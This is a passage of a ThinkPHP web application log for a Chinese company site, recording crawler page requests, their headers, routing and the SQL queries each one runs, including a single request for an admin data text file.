] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'product', 2 => 'zycp', ), ) [ info ] [ HEADER ] array ( 'if-modified-since' => 'Thu, 15 Jul 2021 18:24:42 GMT', 'accept-encoding' => 'gzip, deflate, br', 'user-agent' => 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'from' => 'googlebot(at)googlebot.com', 'accept' => 'text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8', 'connection' => 'close', 'amp-cache-transform' => 'google;v="1..7"', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/product/zycp_html' => '', ) [ info ] [ RUN ] app\index\controller\Product->zycp[ D:\WWW\kinsasa\application\index\controller\Product.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\product\zycp.htm [ array ( 0 => 'res', 1 => 'page', 2 => 'types', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `product` WHERE `cate_id` = 2 AND `state` = 1 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`cate_id`,`type_id`,`name`,`pro_name`,`sp`,`sm_img` FROM `product` WHERE `cate_id` = 2 AND `state` = 1 ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 0,9 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `type_id` FROM `product` WHERE `cate_id` = 2 AND `state` = 1 GROUP BY `type_id` [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `type` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `type` WHERE `id` IN (1) [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T12:19:54+08:00 ] 112.47.58.56 GET / [ info ] www.kinsana.cn/ [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,016.00kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept' => '*/*', 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T12:34:29+08:00 ] 54.36.148.13 GET / [ info ] xn--vhqsn14am88k.com/ [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,015.95kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'deflate, gzip, br', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)', 'host' => 'xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T12:35:27+08:00 ] 112.47.58.46 GET /data/admin/allowurl.txt [ info ] www.kinsana.cn/data/admin/allowurl.txt [运行时间:0.046875s][吞吐率:21.33req/s] [内存消耗:1,069.13kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'data', 1 => 'admin', 2 => 'allowurl.txt', ), ) [ info ] [ HEADER ] array ( 'content-type' => 'application/x-www-form-urlencoded', 'connection' => 'close', 'accept' => '*/*', 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/data/admin/allowurl_txt' => '', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T13:00:16+08:00 ] 112.47.58.40 GET / [ info ] www.kinsana.cn/ [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,016.00kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept' => '*/*', 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T13:18:32+08:00 ] 106.11.154.43 GET /index/product/cpxq/id/129.html [ info ] www.kinsana.cn/index/product/cpxq/id/129.html [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,018.16kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'product', 2 => 'cpxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-language' => 'zh-CN,zh;q=0.9', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36', 'upgrade-insecure-requests' => '1', 'host' => 'www.kinsana.cn', 'accept-encoding' => 'gzip, deflate', ) [ info ] [ PARAM ] array ( '/index/product/cpxq/id/129_html' => '', 'id' => '129', ) [ info ] [ RUN ] app\index\controller\Product->cpxq[ D:\WWW\kinsasa\application\index\controller\Product.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\product\cpxq.htm [ array ( 0 => 'res', 1 => 'photoRes', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT * FROM `product` `p` INNER JOIN `type` `t` ON `p`.`type_id`=`t`.`id` WHERE `p`.`id` = '129' LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `goods_photo` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `goods_photo` WHERE `goods_id` = 129 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T13:37:19+08:00 ] 116.179.32.173 GET /index/product/cpxq/id/138.html [ info ] www.kinsana.cn/index/product/cpxq/id/138.html [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,010.23kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'product', 2 => 'cpxq', ), ) [ info ] [ HEADER ] array ( 'accept' => '*/*', 'accept-encoding' => 'gzip', 'accept-language' => 'zh-cn,zh-tw', 'user-agent' => 'Mozilla/5.0 (Linux;u;Android 4.2.2;zh-cn;) AppleWebKit/534.46 (KHTML,like Gecko) Version/5.1 Mobile Safari/10600.6.3 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/product/cpxq/id/138_html' => '', 'id' => '138', ) [ info ] [ RUN ] app\index\controller\Product->cpxq[ D:\WWW\kinsasa\application\index\controller\Product.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\product\cpxq.htm [ array ( 0 => 'res', 1 => 'photoRes', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` `p` INNER JOIN `type` `t` ON `p`.`type_id`=`t`.`id` WHERE `p`.`id` = '138' LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `goods_photo` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `goods_photo` WHERE `goods_id` = 138 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T13:37:20+08:00 ] 220.181.108.92 GET /index/contanct/yfzx.html [ info ] www.kinsana.cn/index/contanct/yfzx.html [运行时间:0.062500s][吞吐率:16.00req/s] [内存消耗:1,326.53kb] [文件加载:45] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'contanct', 2 => 'yfzx', ), ) [ info ] [ HEADER ] array ( 'accept' => '*/*', 'accept-encoding' => 'gzip', 'if-none-match' => '"@NULL@"', 'accept-language' => 'zh-cn,zh-tw', 'user-agent' => 'Mozilla/5.0 (Linux;u;Android 4.2.2;zh-cn;) AppleWebKit/534.46 (KHTML,like Gecko) Version/5.1 Mobile Safari/10600.6.3 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/contanct/yfzx_html' => '', ) [ info ] [ RUN ] app\index\controller\Contanct->yfzx[ D:\WWW\kinsasa\application\index\controller\Contanct.php ] [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\contanct\yfzx.htm [ array ( ) ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T13:42:34+08:00 ] 111.225.149.20 GET /index/product/cpxq/id/79.html [ info ] www.kinsana.cn/index/product/cpxq/id/79.html [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,027.09kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'product', 2 => 'cpxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'gzip, deflate', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'accept-language' => 'zh,zh-CN;q=0.9', 'user-agent' => 'Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)', 'upgrade-insecure-requests' => '1', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/product/cpxq/id/79_html' => '', 'id' => '79', ) [ info ] [ RUN ] app\index\controller\Product->cpxq[ D:\WWW\kinsasa\application\index\controller\Product.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\product\cpxq.htm [ array ( 0 => 'res', 1 => 'photoRes', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` `p` INNER JOIN `type` `t` ON `p`.`type_id`=`t`.`id` WHERE `p`.`id` = '79' LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `goods_photo` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `goods_photo` WHERE `goods_id` = 79 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T13:45:59+08:00 ] 185.191.171.43 GET /index/news/xwxq/id/214.html [ info ] xn--vhqsn14am88k.com/index/news/xwxq/id/214.html [运行时间:0.281250s][吞吐率:3.56req/s] [内存消耗:2,172.33kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)', 'connection' => 'close', 'accept-encoding' => 'gzip,deflate', 'accept' => 'text/html, application/rss+xml, application/atom+xml, text/xml, text/rss+xml, application/xhtml+xml', 'host' => 'xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/214_html' => '', 'id' => '214', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 214 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 214 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T13:46:00+08:00 ] 123.125.186.24 GET /index/news/xwxq/id/32.html [ info ] www.kinsana.cn/index/news/xwxq/id/32.html [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:2,195.89kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (Linux; Android 4.1.2; SHV-E250S Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36', 'upgrade-insecure-requests' => '1', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/32_html' => '', 'id' => '32', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 32 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 32 [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T13:50:16+08:00 ] 106.11.159.65 GET /static/css/iconfont.css [ info ] www.kinsana.cn/static/css/iconfont.css [运行时间:0.046875s][吞吐率:21.33req/s] [内存消耗:1,069.28kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'static', 1 => 'css', 2 => 'iconfont.css', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'YisouSpider', 'referer' => 'http://www.kinsana.cn/', 'host' => 'www.kinsana.cn', 'accept-language' => 'zh-CN,zh-TW;q=0.9,zh;q=0.8,en;q=0.7', 'accept-encoding' => 'gzip', 'accept' => '*/*', ) [ info ] [ PARAM ] array ( '/static/css/iconfont_css' => '', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T13:51:12+08:00 ] 118.184.177.105 GET / [ info ] www.xn--vhqsn14am88k.com/ [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,016.02kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T14:11:08+08:00 ] 216.244.66.198 GET /index/news/xwxq/id/158.html [ info ] www.kinsana.cn/index/news/xwxq/id/158.html [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,171.73kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-charset' => 'utf-8;q=0.7,iso-8859-1;q=0.2,*;q=0.1', 'user-agent' => 'Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/158_html' => '', 'id' => '158', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 158 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 158 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T14:11:30+08:00 ] 49.7.20.157 GET /index/news/xwxq/id/22.html [ info ] www.kinsana.cn/index/news/xwxq/id/22.html [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,044.06kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/22_html' => '', 'id' => '22', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 22 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 22 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T14:17:29+08:00 ] 203.208.60.39 GET /index/about/gczs.html [ info ] www.kinsana.cn/index/about/gczs.html [运行时间:0.062500s][吞吐率:16.00req/s] [内存消耗:1,285.06kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'about', 2 => 'gczs', ), ) [ info ] [ HEADER ] array ( 'if-modified-since' => 'Wed, 14 Jul 2021 18:45:08 GMT', 'accept-encoding' => 'gzip, deflate, br', 'user-agent' => 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'from' => 'googlebot(at)googlebot.com', 'accept' => 'text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8', 'connection' => 'close', 'amp-cache-transform' => 'google;v="1..7"', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/about/gczs_html' => '', ) [ info ] [ RUN ] app\index\controller\About->gczs[ D:\WWW\kinsasa\application\index\controller\About.php ] [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\about\gczs.htm [ array ( ) ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T14:38:35+08:00 ] 49.7.20.112 GET /index/news/xwxq/id/175.html [ info ] www.kinsana.cn/index/news/xwxq/id/175.html [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,170.05kb] 